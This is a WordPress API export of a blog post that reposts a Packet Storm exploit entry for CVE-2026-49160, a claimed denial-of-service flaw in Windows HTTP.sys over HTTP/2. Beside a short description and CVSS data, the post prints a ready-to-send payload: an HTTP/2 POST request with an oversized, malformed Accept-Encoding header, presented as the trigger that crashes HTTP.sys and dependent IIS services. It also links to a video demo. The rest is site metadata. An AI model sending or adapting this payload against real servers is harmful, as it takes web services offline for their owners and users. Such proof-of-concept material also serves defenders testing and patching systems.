{"id":65442,"date":"2026-06-24T12:47:21","date_gmt":"2026-06-24T12:47:21","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=65442"},"modified":"2026-06-24T12:47:21","modified_gmt":"2026-06-24T12:47:21","slug":"httpsys-http2-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=65442","title":{"rendered":"\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service_PACKETSTORM:224227"},"content":{"rendered":"

{“lastseen”:”2026-06-24T17:08:27″,”description”:”This advisory provides simple proof of concept details to trigger the HTTP\/2 denial of service condition related to malformed Accept-Encoding headers…”,”published”:”2026-06-24T00:00:00″,”modified”:”2026-06-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:224227″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-49160″],”sourceData”:”# Titles: CVE-2026-49160 – HTTP.sys HTTP\/2 Denial of Service (DoS) Vulnerability\\n # Author: nu11secur1ty\\n # Date: 06\/24\/2026\\n # Vendor: Microsoft Corporation\\n # Software: Windows HTTP.sys (HTTP\/2 Protocol Stack)\\n # Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-49160\\n \\n ## Description:\\n \\n A critical Denial of Service (DoS) vulnerability exists in the Windows\\n HTTP.sys kernel-mode driver, specifically in its handling of HTTP\/2\\n protocol requests. The vulnerability, tracked as CVE-2026-49160, allows an\\n unauthenticated remote attacker to cause uncontrolled resource consumption\\n (CWE-400) by sending a specially crafted HTTP\/2 request with an oversized\\n and malformed Accept-Encoding header. This triggers excessive memory\\n allocation and CPU utilization within HTTP.sys, effectively crashing the\\n service and rendering all dependent web services (such as IIS) unavailable.\\n The attack can be executed within seconds and does not require any form of\\n authentication or user interaction. All supported versions of Windows\\n Server (2016, 2019, 2022, 2025) and Windows client OS (10, 11) are affected\\n prior to the June 2026 security update.\\n \\n STATUS: MEDIUM – HIGH\/ Vulnerability\\n \\n [+]Payload:\\n “` POST\\n POST \/ HTTP\/2\\n Host: target.com\\n Accept-Encoding:\\n AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY\\u0026AU\\u0026**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************stupiD,*,,\\n “`\\n \\n [+]Demo:\\n Video Demonstration\\n [url](https:\/\/www.patreon.com\/nu11secur1ty\/posts\/cve-2026-49160-161926764)\\n \\n Time spent:\\n 00:01:20″,”sourceHref”:”https:\/\/packetstorm.news\/download\/224227″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/224227\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-24T17:08:27″,”description”:”This advisory provides simple proof of concept details to trigger the HTTP\/2 denial of service condition related to malformed Accept-Encoding headers…”,”published”:”2026-06-24T00:00:00″,”modified”:”2026-06-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-65442","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service_PACKETSTORM:224227 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=65442\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service_PACKETSTORM:224227 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-24T17:08:27″,”description”:”This advisory provides simple proof of concept details to trigger the HTTP\/2 denial of service condition related to malformed Accept-Encoding headers…”,”published”:”2026-06-24T00:00:00″,”modified”:”2026-06-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=65442\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-24T12:47:21+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65442#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65442\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 HTTP.sys HTTP\\\/2 Denial of Service_PACKETSTORM:224227\",\"datePublished\":\"2026-06-24T12:47:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65442\"},\"wordCount\":373,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=65442#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65442\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65442\",\"name\":\"\ud83d\udcc4 HTTP.sys HTTP\\\/2 Denial of Service_PACKETSTORM:224227 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-24T12:47:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65442#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=65442\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65442#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 HTTP.sys HTTP\\\/2 Denial of Service_PACKETSTORM:224227\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service_PACKETSTORM:224227 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=65442","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service_PACKETSTORM:224227 - zero redgem","og_description":"{“lastseen”:”2026-06-24T17:08:27″,”description”:”This advisory provides simple proof of concept details to trigger the HTTP\/2 denial of service condition related to malformed Accept-Encoding headers…”,”published”:”2026-06-24T00:00:00″,”modified”:”2026-06-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of...","og_url":"https:\/\/zero.redgem.net\/?p=65442","og_site_name":"zero redgem","article_published_time":"2026-06-24T12:47:21+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=65442#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=65442"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service_PACKETSTORM:224227","datePublished":"2026-06-24T12:47:21+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=65442"},"wordCount":373,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=65442#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=65442","url":"https:\/\/zero.redgem.net\/?p=65442","name":"\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service_PACKETSTORM:224227 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-24T12:47:21+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=65442#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=65442"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=65442#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 HTTP.sys HTTP\/2 Denial of Service_PACKETSTORM:224227"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/65442","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=65442"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/65442\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=65442"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=65442"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=65442"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}